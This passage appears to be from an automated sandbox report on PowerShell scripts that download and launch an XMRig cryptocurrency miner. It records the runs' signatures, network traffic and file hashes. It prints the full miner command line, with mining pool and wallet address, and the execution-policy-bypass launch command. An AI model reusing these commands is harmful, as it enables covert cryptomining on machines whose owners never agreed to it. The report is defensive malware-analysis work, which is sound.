N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

memory/4092-0-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-5-0x00000210F3470000-0x00000210F3492000-memory.dmp

memory/4092-7-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-9-0x00000210F3B00000-0x00000210F3B76000-memory.dmp

memory/4092-10-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmz401ki.bb0.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4092-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-61-0x00000210F34A0000-0x00000210F34AA000-memory.dmp

memory/4092-48-0x00000210F3AA0000-0x00000210F3AB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 6ceda7ef7937d647f4640fdde8f69e68
SHA1 061dc76d2869e4f6af0277cfca3ee1add96c6937
SHA256 c3f59fa575df56481efe50cd65781cadd7dfdecba66aa01c396a89446c619bb2
SHA512 1495eb20a9340505f4f9b232dc2faff53e98c730569e06d239c47cf9646233b7ea0451f94017ce461092b866c7de85c0de41f69a09c0ba06a2420ff00242bb1c

memory/4712-90-0x000001DC0CD10000-0x000001DC0CD30000-memory.dmp

memory/4712-91-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-92-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4092-93-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-94-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-95-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4712-96-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-97-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-98-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-99-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-100-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-101-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-102-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-103-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-104-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-105-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-106-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

memory/4712-107-0x00007FF7B3650000-0x00007FF7B4283000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240426-en

Max time kernel

142s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3368-0-0x00007FFA0B7C3000-0x00007FFA0B7C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sy2ccalh.apw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3368-9-0x0000024443020000-0x0000024443042000-memory.dmp

memory/3368-10-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-11-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-12-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-15-0x00000244430A0000-0x00000244430AA000-memory.dmp

memory/3368-14-0x00000244431B0000-0x00000244431C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3924-46-0x000001B83A4F0000-0x000001B83A510000-memory.dmp

memory/3924-47-0x000001B83BCF0000-0x000001B83BD10000-memory.dmp

memory/3924-48-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3368-49-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3368-50-0x00007FFA0B7C3000-0x00007FFA0B7C5000-memory.dmp

memory/3924-51-0x000001B83BD10000-0x000001B83BD30000-memory.dmp

memory/3924-53-0x000001B83BD30000-0x000001B83BD50000-memory.dmp

memory/3368-52-0x00007FFA0B7C0000-0x00007FFA0C282000-memory.dmp

memory/3924-54-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-55-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-57-0x000001B83BD10000-0x000001B83BD30000-memory.dmp

memory/3924-56-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-58-0x000001B83BD30000-0x000001B83BD50000-memory.dmp

memory/3924-59-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-60-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-61-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-62-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-63-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-64-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-65-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-66-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

memory/3924-67-0x00007FF62BBE0000-0x00007FF62C813000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp

Files

memory/2720-0-0x00007FFCE0913000-0x00007FFCE0915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z5hnhzz0.3wn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2720-6-0x000001C050FE0000-0x000001C051002000-memory.dmp

memory/2720-11-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-12-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-14-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/2720-16-0x000001C0514A0000-0x000001C0514AA000-memory.dmp

memory/2720-15-0x000001C0514C0000-0x000001C0514D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1424-47-0x0000021CF9930000-0x0000021CF9950000-memory.dmp

memory/1424-48-0x0000021CF9980000-0x0000021CF99A0000-memory.dmp

memory/1424-49-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-52-0x0000021D8C570000-0x0000021D8C590000-memory.dmp

memory/1424-50-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-51-0x0000021D8C550000-0x0000021D8C570000-memory.dmp

memory/2720-53-0x00007FFCE0913000-0x00007FFCE0915000-memory.dmp

memory/2720-54-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/1424-55-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/2720-56-0x00007FFCE0910000-0x00007FFCE13D1000-memory.dmp

memory/1424-57-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-59-0x0000021D8C570000-0x0000021D8C590000-memory.dmp

memory/1424-58-0x0000021D8C550000-0x0000021D8C570000-memory.dmp

memory/1424-60-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-61-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-62-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-63-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-64-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-65-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-66-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-67-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

memory/1424-68-0x00007FF7D0AC0000-0x00007FF7D16F3000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

146s

Max time network

155s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.229.19:443 tcp

Files

memory/4360-0-0x00007FFD03473000-0x00007FFD03475000-memory.dmp

memory/4360-9-0x000001B841950000-0x000001B841972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgxrwn12.ydg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4360-10-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-11-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-12-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-14-0x000001B841CF0000-0x000001B841D02000-memory.dmp

memory/4360-15-0x000001B829470000-0x000001B82947A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3632-46-0x0000021E96D70000-0x0000021E96D90000-memory.dmp

memory/3632-47-0x0000021E96DB0000-0x0000021E96DD0000-memory.dmp

memory/3632-48-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/4360-49-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/4360-51-0x00007FFD03473000-0x00007FFD03475000-memory.dmp

memory/3632-50-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/4360-52-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp

memory/3632-54-0x0000021E96DD0000-0x0000021E96DF0000-memory.dmp

memory/3632-53-0x0000021F29990000-0x0000021F299B0000-memory.dmp

memory/3632-55-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-56-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-57-0x0000021F29990000-0x0000021F299B0000-memory.dmp

memory/3632-58-0x0000021E96DD0000-0x0000021E96DF0000-memory.dmp

memory/3632-59-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-60-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-61-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-62-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-63-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-64-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-65-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-66-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

memory/3632-67-0x00007FF7907F0000-0x00007FF791423000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

142s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dykta5p2.fkx.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted 2024-05-27 18:28
Reported 2024-05-27 18:32
Platform win10v2004-20240426-en
Max time kernel 149s
Max time network 145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

